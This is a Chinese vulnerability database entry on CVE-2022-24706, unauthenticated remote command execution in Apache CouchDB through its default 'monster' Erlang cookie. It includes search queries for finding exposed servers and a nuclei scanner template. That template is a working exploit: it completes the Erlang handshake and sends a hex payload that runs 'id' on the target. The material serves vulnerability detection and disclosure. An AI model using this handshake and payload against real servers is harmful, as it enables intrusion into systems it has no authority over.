漏洞信息
漏洞名称: Apache CouchDB Erlang Distribution - Remote Command Execution Vulnerability
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个面向文档的数据库,使用JSON格式存储数据,并通过HTTP API进行操作。CouchDB广泛应用于Web应用程序和企业级服务中,因其分布式特性和易于扩展而受到开发者的青睐。该漏洞存在于Apache CouchDB 3.2.2之前的版本中,由于默认安装配置不当,攻击者可以在不进行身份验证的情况下访问系统并获得管理员权限。漏洞的技术根源在于CouchDB默认使用的Erlang cookie值为”monster”,这一硬编码凭证使得攻击者能够绕过认证机制,执行远程命令。此漏洞的利用可能导致攻击者完全控制受影响的系统,执行任意代码,进而可能导致数据泄露、服务中断或其他恶意活动。由于攻击无需认证且可以自动化执行,因此该漏洞的安全风险极高。
产品厂商: Apache
产品名称: CouchDB
影响版本: version < 3.2.2
搜索语法: product:”CouchDB” OR product:”couchdb” OR cpe:”cpe:2.3:a:apache:couchdb”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2022%2FCVE-2022-24706.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
id: CVE-2022-24706
info:
name: CouchDB Erlang Distribution - Remote Command Execution
author: Mzack9999,pussycat0x, NaN-KoreLogic
severity: critical
description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
reference:
- https://www.exploit-db.com/exploits/50914
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
- http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24706
cwe-id: CWE-1188
epss-score: 0.94412
epss-percentile: 0.99975
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: apache
product: couchdb
shodan-query:
- product:"CouchDB"
- product:"couchdb"
- cpe:"cpe:2.3:a:apache:couchdb"
tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
variables:
name_msg: "00156e00050007499c4141414141414041414141414141"
challenge_reply: "00157201020304"
cookie: "monster"
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:{{Port}}"
inputs:
- data: "{{name_msg}}"
type: hex
read: 1024
- read: 1024
name: challenge
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type: hex
- data: "{{cmd}}"
type: hex
read: 1024
matchers:
- type: word
part: raw
words:
- "uid"
- "gid"
- "groups"
condition: and
|